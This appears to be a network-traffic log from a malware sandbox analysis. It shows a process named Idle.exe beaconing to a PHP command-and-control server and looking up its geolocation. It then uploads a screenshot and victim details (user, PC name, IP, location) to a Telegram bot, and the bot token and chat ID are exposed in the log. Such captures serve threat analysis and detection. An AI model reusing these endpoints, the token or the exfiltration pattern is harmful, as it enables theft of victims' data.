                                                                                            Jan 11, 2025 18:10:44.963181019 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0MRp2TykkaPpXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:45.731498003 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            38192.168.2.4539465.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:10:50.744741917 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dRp2T0EkaPVTRqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:51.481988907 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:51 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            39192.168.2.4539475.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:10:56.495902061 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dJp2T3VlaPdXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:57.234077930 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.45363934.117.59.814434476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-11 17:07:18 UTC63OUTGET /json HTTP/1.1
                                                                                            Host: ipinfo.io
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-11 17:07:18 UTC345INHTTP/1.1 200 OK
                                                                                            access-control-allow-origin: *
                                                                                            Content-Length: 321
                                                                                            content-type: application/json; charset=utf-8
                                                                                            date: Sat, 11 Jan 2025 17:07:18 GMT
                                                                                            x-content-type-options: nosniff
                                                                                            via: 1.1 google
                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2025-01-11 17:07:18 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                            Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.453641149.154.167.2204434476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-11 17:07:19 UTC691OUTPOST /bot7170051875:AAE6pL_pl17E85H-TlJS2rKEh_uqVfRc8Gk/sendPhoto?chat_id=5922069347&caption=%E2%9D%95%20Pipavsya%20%E2%9D%95%0A%E2%80%A2%20ID%3A%202068c5dd94a8a9c670748c61bdf89871812759c4%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20035347%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%208.46.123.189%0A%E2%80%A2%20GEO%3A%20US%20%2F%20New%20York%20City%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CIdle.exe HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3253052978f8
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 696321
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-11 17:07:20 UTC25INHTTP/1.1 100 Continue
                                                                                            2025-01-11 17:07:20 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 35 33 30 35 32 39 37 38 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 68 6f 74 6f 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e ec fd 77 b8 6d 55 99 a7 0d
                                                                                            Data Ascii: --------------------------8dd3253052978f8Content-Disposition: form-data; name="photo"; filename="screenshot.png"Content-Type: multipart/form-dataPNGIHDRCsRGBgAMAapHYsodIDATx^wmU
                                                                                            2025-01-11 17:07:20 UTC16355OUTData Raw: 01 61 8d e2 92 7c aa f4 63 2d fb 33 af 39 62 b4 12 78 a0 ca 3c c9 39 b5 c4 68 11 80 b9 6a af 19 7b 1e 71 e4 21 f2 8f 56 79 cc 01 7d 62 88 c1 52 00 4a f6 49 ea b9 ec d3 bc 20 46 1e f9 8c 27 2a 00 3f 7e 65 20 f7 46 e1 da fb ab d3 ae 7b b0 3a ed c6 87 13 8f 54 e7 7c f7 27 d5 55 f7 fe ac fa de 8f 7f 56 5d bd f6 c1 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 2e d4 c2 af 10 80 54 ff 3d f2 99 ba ff f8 05 d5 93 37 1e 32 ab 0a f0 a9 ef d5 55 80 cf 7c ff 6d d5 33 08 c0 1f 22 00 9b 63 c0 ad 00 fc c7 ea 37 f7 1e 16 8a bc b9 12 49 bc 75 c5 e9 a7 9f 5e 3d ff 9b df 58 a5 5f 2d 00 67 c6 f1 d1 df 71 ab ff b2 00 6c e4 5f 2b 00 8f 3b 2e 14 78 f3 65 43 12 80 a0 17 78 00 47 79 a3 9c 51 d0 1e 91 f4 73 22 69 37 49 42 89 37 1f 16 05 e0 58 44 52 6f 1c 22 e9 e7 44 d2 cf 89 a4 9f 13 c9
                                                                                            Data Ascii: a|c-39bx<9hj{q!Vy}bRJI F'*?~e F{:T|'UV]~IIb.T=72U|m3"c7Iu^=X_-gql_+;.xeCxGyQs"i7IB7XDRo"D
                                                                                            2025-01-11 17:07:20 UTC16355OUTData Raw: 01 78 67 8f c8 eb 17 1f 46 24 ff 20 12 7d fd 58 14 80 69 ce a4 1e f4 8b 7b 15 e0 40 90 78 8d 00 2c 25 a0 04 a0 57 00 ba fc 73 01 28 a1 17 a1 79 c9 3c cf d7 fe 65 ae a0 0a 90 35 2e fd 9c e5 af b9 ad c5 25 a0 a4 dd 38 48 ea 01 7d c5 9c 32 d7 65 9f 8e 02 d3 47 f2 49 f8 69 5e 31 49 42 72 25 00 f5 0c 41 7f a6 20 70 ec d7 a5 9f 83 00 a4 92 af 14 7d f4 35 46 0c aa 1a 50 f8 d8 65 5f 89 24 9f de 18 8c fc 2b 05 a0 8e fc 7a 65 1f 63 c9 3e 5a e4 9f 57 05 8a 3c de 3b ad 6f 04 a0 aa fa fc b8 2f e2 8f b1 84 a0 f2 75 04 18 19 87 88 5b b1 cf 8d 19 1d ed 95 d8 43 f8 49 e6 d1 07 97 78 ad c8 6b d0 9c e6 55 fd a7 58 b9 8e b7 01 23 f5 38 ee 2b f1 27 d1 e7 7d 49 3f 09 43 49 43 64 9e 04 a0 2a 00 91 7d b4 90 8f f9 36 22 b0 ac 0a 64 0e b9 27 b1 27 01 28 b9 c7 1c 68 4e 15 80 7e 04
                                                                                            Data Ascii: xgF$ }Xi{@x,%Ws(y<e5.%8H}2eGIi^1IBr%A p}5FPe_$+zec>ZW<;o/u[CIxkUX#8+'}I?CICd*}6"d''(hN~
                                                                                            2025-01-11 17:07:20 UTC16355OUTData Raw: 40 84 f2 2d c0 a5 0c 14 51 8e 70 69 a8 fc 2c 0f 11 77 af 49 6b 5f 9b f2 1a 18 2b b6 f4 90 74 ef cd 38 04 71 98 05 df cd 3d 2c 79 ed 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd e7 20 24 5f ef 0b 43 bc 7a 50 e3 25 af 48 6b 8c a9 fd d2 75 f7 b9 ae 9a de ff c6 6a f9 41 e9 fb 49 31 fa c4 bb fb 5e 9f e7 68 89 31 e7 15 80 25 12 7f 2e 01 c9 d7 1a 04 a0 aa fa 72 35 9f d1 c6 db 0a 3f c4 de d5 d5 b2 7d ae a9 96 ef 8b e0 43 dc 31 77 55 8e d1 ef ee 7e 79 35 b5 c7 15 79 bc 22 dd 2f a2 6f 65 ba cf 55 e9 3e 69 d9 47 47 81 e9 4b 06 92 3b 23 04 af ce 47 83 69 5d 2e f6 63 0a f1 86 b8 db 07 41 98 d6 ef 7e 55 d5 dd f5 8a 0c 7d e6 60 09 a2 2e 41 0c 34 66 7d 67 97 cb 33 f4 81 b5 b4 cc b3 56 f9 f4
                                                                                            Data Ascii: @-Qpi,wIk_+t8q=,y-b@^)H\~HI J"U5Xy%V $_CzP%HkujAI1^h1%.r5?}C1wU~y5y"/oeU>iGGK;#Gi].cA~U}`.A4f}g3V
                                                                                            2025-01-11 17:07:20 UTC16355OUTData Raw: 89 f2 0e a9 e7 31 5f 25 5f 5b 19 08 31 27 4a 40 c6 b4 ae 21 07 f9 c6 b1 de a3 9f 7c 79 ed 23 cf 5a 51 87 4c db 3f 08 42 65 9b 39 b4 f6 eb 91 db 02 63 65 9c 7d a5 9c 7b 1a a7 55 00 12 47 f0 b9 96 31 71 f7 97 28 1a 6d a3 f4 73 7d ed ff ea 27 6b b5 1f 55 7f 88 bb 56 02 2a fb 22 ce 29 0e c5 98 b2 90 d8 ee 11 e0 05 64 d2 2c 92 49 bd 65 c8 f6 5c 1a 2f 10 c9 c8 f2 03 99 d4 5b 86 29 d1 97 41 c5 9f fd 4c 04 96 36 db 57 c6 77 05 16 f6 5c fc c0 fa 25 22 92 55 07 72 5c 38 79 6f e0 ca 39 e5 f7 34 b0 7a 6e c9 cf 24 5e 20 93 84 92 e5 6f 56 f8 ad 9e d9 93 cd 6d 87 5d 01 b8 1c 87 b5 00 dc 04 99 e8 9b c5 06 79 b7 03 02 30 93 76 3b c9 ae 00 9c cf 32 02 10 52 09 38 87 4c e4 6d 87 65 05 e0 da 5b ca cf 95 c4 25 93 7e 91 79 b2 ef 70 7e 07 a0 64 b2 2f 03 99 b7 15 32 01 28 99 f0
                                                                                            Data Ascii: 1_%_[1'J@!|y#ZQL?Be9ce}{UG1q(ms}'kUV*")d,Ie\/[)AL6Ww\%"Ur\8yo94zn$^ oVm]y0v;2R8Lme[%~yp~d/2(
                                                                                            2025-01-11 17:07:20 UTC16355OUTData Raw: 4e bb 7d e4 91 16 80 0b 49 a4 dc e1 44 26 f5 96 61 57 00 6e 8f 4c fa 45 5a e1 d7 32 4b 00 66 42 30 23 95 76 3b 49 22 f5 96 21 93 7e 91 5c fa 45 d6 85 5f 46 26 fd 22 8f 75 01 a8 d4 9b 45 2b ff 36 c4 37 21 00 b3 39 39 58 02 50 5a 01 d8 4a be 18 cf e6 77 12 05 60 94 80 99 d4 5b 86 4c fa 45 1e 0d 02 d0 fe 66 05 e0 14 41 f4 cd 42 81 27 59 6c 33 b4 02 d0 58 95 81 89 00 ac bc 6c fd 02 90 58 01 68 15 a0 f2 2f 62 05 60 5f 05 d8 57 f3 79 d9 47 94 7b 0a 41 41 0c b6 c4 ea bf 99 92 6f 06 54 03 5a bd 37 0b 04 20 72 2f 56 fe 79 e4 57 e1 a7 fc 33 87 31 82 cf f7 fc b5 d2 4f fa 9c 69 32 01 18 fb 40 9f 8b 42 68 7d 07 60 94 78 4a 3d ab fa fa b9 6b a6 24 a0 95 80 56 fa b9 a6 5d 8f 00 8c 12 b0 15 80 47 95 cf e6 bb 00 11 80 be fb cf 8a 40 c4 5d 7b f4 57 e9 c7 9c f2 4f 98 8f 37
                                                                                            Data Ascii: N}ID&aWnLEZ2KfB0#v;I"!~\E_F&"uE+67!99XPZJw`[LEfAB'Yl3XlXh/b`_WyG{AAoTZ7 r/VyW31Oi2@Bh}`xJ=k$V]G@]{WO7
                                                                                            2025-01-11 17:07:20 UTC16355OUTData Raw: 08 b5 82 30 08 40 85 5d 1b 8b e2 ce 71 24 ce b1 86 f5 a0 08 cc 04 a0 b9 08 b7 56 f2 d9 b7 82 4f 49 17 21 5e 2b f8 4a 9f 5c fa ae 8f 32 d0 8a 3f 04 e0 e3 4e bc b2 3b fa 84 f2 fb 5c d6 90 c3 1c eb 7c 0e 10 57 12 d6 67 0c e2 4d 89 87 6c 53 c8 ed 3f a6 7c c6 20 e5 8c 3b 86 4c e0 d1 67 3f e5 5d 5c 47 be 72 4f f1 18 f3 e9 c7 bd 10 87 ce d5 63 c5 bf fc b1 2a fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 16 b1 43 02 b0 ad fe a3 da 8f e3 c0 08 bf ec 17 12 90 79 8e 08 d3 8f 6b 37 73 69 c8 61 29 00 af 41 00 9e 3e 54 ff 21 ff 9a ea bf 1f bf bf bb e8 93 bf 33 f5 0e c0 17 7d e2 7d dd 7f 7a e1 4b bb 33 bf f9 f1 ee 7f bf e1 f3 dd 6d f7 de 9d 08 c0 1f 77 ff db 75 b7 74 c7 9c fd dd 2a 66 1e 0d 02 f0 b4 d3 4f ef 1e 78 f0 c1 2a a5 90 7c 4a a9 be 02 70 5d fe 51 ed 16 a5
                                                                                            Data Ascii: 0@]q$VOI!^+J\2?N;\|WgMlS?| ;Lg?]\GrOc*|?o`&Cyk7sia)A>T!3}}zK3mwut*fOx*|Jp]Q
                                                                                            2025-01-11 17:07:20 UTC16355OUTData Raw: 45 f2 af 1f ca 97 d8 8b 04 20 82 cf 8b 40 55 06 d2 67 2e c7 0c 5f d1 c7 38 aa f4 93 04 94 08 a4 32 b0 b5 c7 15 69 7c 6f db 1b 11 87 90 73 10 1b db cb f2 90 77 2e 3e b9 ef f5 69 ea 80 9b d2 d2 fd ed 73 d8 b8 b5 c7 55 d3 8e fa 6a ec 45 9f 17 89 12 84 99 bd ec 75 9c e4 93 d8 23 4e 55 9f e6 7c 8e cf 6b ed fa e3 26 ae 16 71 c8 11 60 04 9d 2a fe 3a c2 cf d6 d6 32 b0 9a ab a4 9e c4 9e 17 7f e0 e7 3d c8 42 8e 18 6b 3f da 7c f4 d7 f6 5d be cf 4d 69 d9 9e f6 7b b8 ab bd a7 9d a7 cb 3f 2f 00 4b 31 87 b0 43 fc 71 21 c8 36 b6 47 ae d2 eb 23 f9 fc 3c d0 d7 98 bd e8 2b c7 e7 29 d7 57 f3 81 af f2 d3 9c c4 9f 47 12 50 97 7d 48 f8 a9 fa 8f cb 41 88 51 a9 27 d1 47 ab 67 f9 49 ec 79 09 28 18 0b c6 5e 0c 7a 41 48 5f 17 7d 78 e9 a7 2a 3f d0 9c 2a fe 24 00 b3 fc b3 ef 25 57 e1
                                                                                            Data Ascii: E @Ug._82i|osw.>isUjEu#NU|k&q`*:2=Bk?|]Mi{?/K1Cq!6G#<+)WGP}HAQ'GgIy(^zAH_}x*?*$%W
                                                                                            2025-01-11 17:07:20 UTC16355OUTData Raw: ee 1c f7 b5 cf 64 7d a0 2f 34 cf 51 de 52 ea d1 17 12 82 92 82 e5 bc 7f 3e 20 d0 27 b7 a9 20 b4 f5 12 7c 12 79 5e e0 f9 8a 3f 09 3e e5 33 e7 8f 05 b7 77 b8 22 43 5f f9 92 78 db ec 71 7d 6e 19 4b f8 21 eb 90 74 c8 3d c4 1e f3 92 79 be aa 8f 5c 60 5c 0a 40 d6 6a 8e b1 f2 e9 f3 9a 5e da 79 c9 e7 65 1d a2 af bd ed e5 5d c2 8f 3e b0 8e 1c c9 42 41 1e 73 da c3 e7 68 7f 8e 05 23 da 24 dd 10 71 8c 7d 8c 56 b2 8f be a4 9d 72 7c 5c 6b 24 f0 a8 de 53 df 8b 3e ed 47 9f 38 2d 6b 5b 7f f1 bd bc 66 9b 9d af 4d ff 6c 17 fb fd b7 75 08 c0 2c 0e ad 8f 88 43 ba 49 02 22 ee 88 d3 d7 25 21 92 74 cb 76 b0 df 0b 6b 91 7d b4 e4 92 a7 a3 bb da af 9f 40 24 4e ab 3e 28 5f 8c f4 19 80 b9 ea ee d8 4b 2a 24 e1 68 19 d7 32 d0 8b c1 90 61 f2 22 fc 6b 2f 94 00 04 aa 00 91 80 08 3e a0 2f
                                                                                            Data Ascii: d}/4QR> ' |y^?>3w"C_xq}nK!t=y\`\@j^ye]>BAsh#$q}Vr|\k$S>G8-k[fMlu,CI"%!tvk}@$N>(_K*$h2a"k/>/
                                                                                            2025-01-11 17:07:20 UTC16355OUTData Raw: 1d e9 05 55 f8 49 f8 49 00 2a 4e 8e c4 20 c7 78 bd e8 63 4c cb 18 fc e5 1f 8a a9 5f 3d 2b f0 9f b2 e8 53 d5 1f 02 50 15 81 59 0a 5a 1f d9 47 35 9e 2e e2 00 09 3a 62 12 73 9a f3 63 fa 20 81 e7 21 46 1e 92 4f 95 81 12 7b c2 0b 42 ad d1 eb 33 5e 14 80 43 12 4a b0 1e f3 3e 1e cd bf 1e 88 a4 99 a7 14 62 51 4e 49 b9 66 2e 44 fb 0f 43 b4 e7 30 78 c9 d7 8f 52 ec f5 8a 4f c7 de e7 1c f0 72 6f 10 4a 41 37 68 6c f6 d8 9f 9b 3e 44 d2 cf 53 ca bc d9 50 4a b7 26 b6 fe 37 d3 e6 16 9c 40 ea 0d c5 86 48 ea 55 b4 d6 3d 13 c6 bb b1 9f c1 39 f0 46 11 80 02 89 d7 dd ce 4d 00 4e 13 75 43 32 93 00 6c 5e 2b cb 3e 7b bd 69 d8 9f 43 87 97 80 92 7d 25 9d 79 fb be 6d ef d6 39 f6 1d f2 dc c1 b5 f6 1a e7 fd 2e 3f 23 70 e9 fa 97 d2 d4 86 97 d3 f2 0b 5e 4d cb ac 5d ba ee c5 34 79 de f3
                                                                                            Data Ascii: UII*N xcL_=+SPYZG5.:bsc !FO{B3^CJ>bQNIf.DC0xROroJA7hl>DSPJ&7@HU=9FMNuC2l^+>{iC}%ym9.?#p^M]4y
                                                                                            2025-01-11 17:07:21 UTC402INHTTP/1.1 400 Bad Request
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Sat, 11 Jan 2025 17:07:20 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 56
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
